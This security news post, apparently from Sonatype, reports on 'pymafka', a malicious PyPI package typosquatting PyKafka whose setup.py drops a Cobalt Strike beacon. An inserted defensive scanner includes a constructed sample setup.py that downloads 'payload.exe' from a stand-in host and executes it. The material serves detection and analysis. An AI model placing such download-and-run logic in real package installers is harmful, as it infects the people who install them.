New ‘pymafka’ malicious package drops Cobalt Strike on macOS, Windows, Linux
This week, Sonatype’s automated malware detection bots discovered the malicious Python package “pymafka” in the PyPI registry.
The package appears to typosquat the legitimate, popular library PyKafka, a friendly Apache Kafka client for Python. The development follows our discovery of another typosquat targeting the Apache Kafka project earlier this month.
PyKafka includes Python implementations of both Kafka producers and consumers, and has been retrieved over 4,240,305 times through user-initiated downloads and mirrors/bots. In contrast, the malicious “pymafka” shows a download count of around 300, as Sonatype reported the discovery in a timely manner to PyPI.
PyMafka Drops Cobalt Strike on Windows, macOS
On May 17, a mysterious “pymafka” package appeared on the PyPI registry. The package was quickly reported by the Sonatype Nexus platform’s automated malware detection capabilities.
The package, ‘pymafka’, may look identical to the popular PyKafka, but its contents reveal a different story.
The Python script ‘setup.py’ inside ‘pymafka’ first detects your platform. Depending on whether you are using Windows, macOS or Linux, an appropriate malicious Trojan is downloaded and executed on the infected system.
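The install-time behaviour described above (platform check, then download, then execute) is what a reviewer should look for in a package’s setup.py before installing it. The following is an added example, not code from the article or from pymafka: a small static triage script that parses a setup.py with Python’s ast module and flags the combination of those three behaviours. The sample setup.py it scans is constructed for the example.

```python
# Added example (not from the article): static triage of a setup.py that
# combines platform detection, a network download and process execution,
# the install-time pattern the article describes for pymafka.
import ast

# Dotted call names indicating each behaviour. Matching is on names as written
# in the source, so aliased imports (import subprocess as sp) would need extra
# handling; this is a triage heuristic for reviewers, not a proof of malice.
PLATFORM_CALLS = {"platform.system", "platform.platform", "platform.machine"}
PLATFORM_ATTRS = {"sys.platform"}
NETWORK_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
                 "requests.get", "urllib.urlopen"}
EXEC_CALLS = {"os.system", "subprocess.Popen", "subprocess.run",
              "subprocess.call", "os.startfile", "os.execv", "exec"}

def _dotted(node):
    """Return 'a.b.c' for an Attribute/Name chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_setup_py(source: str) -> dict:
    """Report which behaviours appear in setup.py text; 'suspicious' means
    it both fetches something from the network and executes a process."""
    found = {"platform_check": False, "network": False, "exec": False}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            found["platform_check"] |= name in PLATFORM_CALLS
            found["network"] |= name in NETWORK_CALLS
            found["exec"] |= name in EXEC_CALLS
        elif isinstance(node, ast.Attribute) and _dotted(node) in PLATFORM_ATTRS:
            found["platform_check"] = True
    found["suspicious"] = found["network"] and found["exec"]
    return found

# Constructed sample mimicking the described behaviour; not the real pymafka code.
SAMPLE_SETUP = '''
import platform, urllib.request, subprocess
from setuptools import setup
if platform.system() == "Windows":
    urllib.request.urlretrieve("http://example.invalid/win.exe", "payload.exe")
    subprocess.Popen(["payload.exe"])
setup(name="pkg", version="0.0.1")
'''
BENIGN_SETUP = "from setuptools import setup\nsetup(name='pkg', version='1.0')\n"
```

Run `scan_setup_py` over the extracted sdist’s setup.py before installing; a hit on “suspicious” is a reason to read the file by hand, since legitimate setup scripts rarely need to fetch and run binaries.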
The Trojan in question is a Cobalt Strike (CS) beacon. Cobalt Strike is a penetration testing software tool typically used by red teams and ethical hackers to simulate real-world cyberattacks, especially during security assessments.
But, time and time again, attackers, including ransomware groups like LockBit, have abused Cobalt Strike to infect their victims.
Interestingly, as the code below shows, on Windows systems the Python script tries to remove the Cobalt Strike tag on ‘C:\Users\Public\iexplorer.exe’. Note that this misspelling stands out because the legitimate Microsoft Internet Explorer process is usually called “iexplore.exe” (no ‘r’ at the end) and is not present in the C:\Users\Public directory.
Downloaded malicious executables are ‘win.exe’ [VirusTotal] and ‘MacOS’ [VirusTotal] with (Read more…)